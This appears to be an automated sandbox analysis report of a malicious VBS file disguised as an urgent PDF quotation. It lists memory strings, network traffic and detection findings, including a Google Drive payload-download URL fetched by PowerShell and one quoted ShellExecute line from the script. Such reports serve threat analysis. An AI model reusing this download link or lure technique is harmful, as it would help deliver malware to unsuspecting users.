      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Sep 2024 07:58:07 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-465ryBlG48LPevoEgAOeSw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652X-GUploader-UploadID: AD-8ljsiWYEzLr6ofLG4ZMF1opB08n-7bb4fcPcr5gfQfkv8Q7apR4SWAxMAw87dLaD8xo-xRRUhJMqc5QServer: UploadServerSet-Cookie: NID=517=Fwd1-JrhNgK2fQ1sYnKrSyAJOSipDf7bur8VNRR2nqooRmfHzu2mybb2CpYyUCU3RxthKHwVEaBfjEjzZyRUfPI4rv2G-tr65LSHnZ50WHBcIjjL__MRwYzW1_9ROTErH3wUquwj--GDmPhmMQP-Nuk_YALaRfkh_LADyFmBLlBsFXlpHA; expires=Tue, 01-Apr-2025 07:58:07 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=noneAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Sep 2024 07:58:13 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-IAkb1jTGa-76829Rq6bNpw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652X-GUploader-UploadID: AD-8ljt2X2d3s5aCRN26rZwTl8JX2GCulcw5i7dFO9FfqP40lyli4Ai4X8sJKX_IXXZ3TNTLOE6GSoFXtwServer: UploadServerSet-Cookie: NID=517=Swf_zx8RlvwN2Z-DKnzCL6Th7r4KGyBckaTRQ4j4hHKJD8Skdkdf5oNJP_fzibaNy5KcwZeC49JzvoFLeBUS1pFhoOYDELm1v6wTkR-7f2Qz2kCidIiR-peuH20Tiev7fimlcJUFpCETwwqhpljN3flIiR_tdyBthPbYmtKIZUx_Z83LpQ; expires=Tue, 01-Apr-2025 07:58:13 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: wscript.exe, 00000000.00000003.1349349433.000001943386F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1350603012.0000019433878000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1349917928.0000019433878000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digi
      Source: wscript.exe, 00000000.00000003.1349349433.000001943386F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1350603012.0000019433878000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1349917928.0000019433878000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.c
      Source: wscript.exe, 00000000.00000003.1323035422.0000019433A98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
      Source: wscript.exe, 00000000.00000003.1349349433.000001943386F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1350657100.0000019433893000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1350068503.000001943388F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1349917928.0000019433878000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1323035422.0000019433A98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
      Source: wscript.exe, 00000000.00000003.1349349433.000001943386F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1350603012.0000019433878000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1351121003.00000194358A6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1349917928.0000019433878000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1323035422.0000019433A98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
      Source: wscript.exe, 00000000.00000003.1349349433.000001943386F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1350603012.0000019433878000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1349917928.0000019433878000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1323035422.0000019433A98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
      Source: wscript.exe, 00000000.00000003.1349349433.000001943386F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1350603012.0000019433878000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1349917928.0000019433878000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4R0
      Source: wscript.exe, 00000000.00000003.1349349433.000001943386F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1350657100.0000019433893000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1350068503.000001943388F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1349917928.0000019433878000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1323035422.0000019433A98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
      Source: wscript.exe, 00000000.00000002.1351121003.00000194358A6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1323035422.0000019433A98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
      Source: wscript.exe, 00000000.00000003.1331521973.0000019433916000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1331955967.0000019433916000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/7
      Source: wscript.exe, 00000000.00000003.1331521973.0000019433916000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1331955967.0000019433916000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/M
      Source: wscript.exe, 00000000.00000003.1331521973.0000019433916000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1331955967.0000019433916000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.0.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
      Source: wscript.exe, 00000000.00000003.1349349433.000001943386F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1350603012.0000019433878000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1349917928.0000019433878000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab9
      Source: wscript.exe, 00000000.00000003.1331521973.0000019433916000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?c8e05410ddccb
      Source: wscript.exe, 00000000.00000003.1349349433.000001943386F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1350657100.0000019433893000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1350068503.000001943388F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1349917928.0000019433878000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabT3
      Source: wscript.exe, 00000000.00000003.1349349433.000001943386F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1350603012.0000019433878000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1349917928.0000019433878000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enj
      Source: wscript.exe, 00000000.00000003.1331955967.00000194338D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?c8e05410dd
      Source: powershell.exe, 00000002.00000002.2609687458.000001D60154F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D600974000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601C3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D60179A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D60102B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D600E31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D600D75000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601DC4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D6005E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601165000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D6016ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D60071F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D600F60000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D600A02000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D600B4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601829000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601652000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.google.com
      Source: powershell.exe, 00000002.00000002.2609687458.000001D601C74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601DC4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601165000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D60071F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D600F60000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601652000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.usercontent.google.com
      Source: powershell.exe, 00000002.00000002.2631379660.000001D6101B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2631379660.000001D610074000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: wscript.exe, 00000000.00000003.1349349433.000001943386F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1350603012.0000019433878000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1351121003.00000194358A6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1349917928.0000019433878000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1323035422.0000019433A98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
      Source: wscript.exe, 00000000.00000003.1349349433.000001943386F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1350603012.0000019433878000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1349917928.0000019433878000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1323035422.0000019433A98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
      Source: wscript.exe, 00000000.00000003.1349349433.000001943386F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1350657100.0000019433893000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1350603012.0000019433878000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1350068503.000001943388F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1349917928.0000019433878000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1323035422.0000019433A98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
      Source: powershell.exe, 00000002.00000002.2609687458.000001D600226000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 00000002.00000002.2609687458.000001D600001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 00000002.00000002.2609687458.000001D600226000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: powershell.exe, 00000002.00000002.2609687458.000001D600001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
      Source: powershell.exe, 00000002.00000002.2609687458.000001D6004F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601C3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601C62000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D600437000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601CD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
      Source: powershell.exe, 00000002.00000002.2631379660.000001D610074000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000002.00000002.2631379660.000001D610074000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000002.00000002.2631379660.000001D610074000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: powershell.exe, 00000002.00000002.2609687458.000001D601C38000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601DC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.googP
      Source: powershell.exe, 00000002.00000002.2609687458.000001D60071F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D600F60000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D600A02000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D60175D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D600B4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601829000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601652000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com
      Source: powershell.exe, 00000002.00000002.2609687458.000001D600226000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176sP
      Source: powershell.exe, 00000002.00000002.2609687458.000001D601C62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.googh
      Source: powershell.exe, 00000002.00000002.2609687458.000001D601C62000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D600491000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601DC4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D60071F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com
      Source: powershell.exe, 00000002.00000002.2609687458.000001D601165000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D60071F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D600F60000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601652000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com(
      Source: powershell.exe, 00000002.00000002.2609687458.000001D600491000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601DC4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D6005E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601165000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D6016ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D60071F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D600F60000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D600A02000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D600ED6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D600B4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601829000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601652000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601162000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s&export=download
      Source: powershell.exe, 00000002.00000002.2609687458.000001D600226000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 00000002.00000002.2631379660.000001D6101B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2631379660.000001D610074000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: powershell.exe, 00000002.00000002.2609687458.000001D6004F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601C3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601C62000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D600437000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601CD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
      Source: powershell.exe, 00000002.00000002.2609687458.000001D6004F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601C3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601C5E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601C62000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D600437000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601CD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
      Source: powershell.exe, 00000002.00000002.2609687458.000001D6004F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601C3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601C62000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D600437000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601CD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
      Source: powershell.exe, 00000002.00000002.2609687458.000001D6004F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601C3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601C5E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601C62000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D600437000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601CD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
      Source: powershell.exe, 00000002.00000002.2609687458.000001D6004F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601C3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601C5E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601C62000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D600437000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601CD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
      Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57680 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57678 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57684 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57687
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57688
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57689
      Source: unknownNetwork traffic detected: HTTP traffic on port 57668 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57675 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57671 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57681 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57677 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57685 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57688 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57674 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
      Source: unknownNetwork traffic detected: HTTP traffic on port 57682 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57686 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57668
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57672
      Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57673
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57674
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57675
      Source: unknownNetwork traffic detected: HTTP traffic on port 57689 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57671
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
      Source: unknownNetwork traffic detected: HTTP traffic on port 57673 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
      Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
      Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
      Source: unknownNetwork traffic detected: HTTP traffic on port 57679 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57683 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57687 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57676
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57677
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57678
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57679
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57683
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57684
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57685
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57686
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57680
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57681
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57682
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
      Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57676 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57672 -> 443
      Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.9:49707 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.186.33:443 -> 192.168.2.9:49708 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.186.33:443 -> 192.168.2.9:49719 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.9:57674 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.9:57685 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.186.33:443 -> 192.168.2.9:57686 version: TLS 1.2

      System Summary

      barindex
      Potential malicious VBS script found (suspicious strings)
      Source: Initial file: Call Betalingsdatos.ShellExecute(Aeronautic, Glosseret, "", "", Milieuvenligste)
      Sample has a suspicious name (potential lure to open the executable)
      Source: Urgent Quotation Notification_pdf.vbsStatic file information: Suspicious name
      Wscript starts Powershell (via cmd or directly)
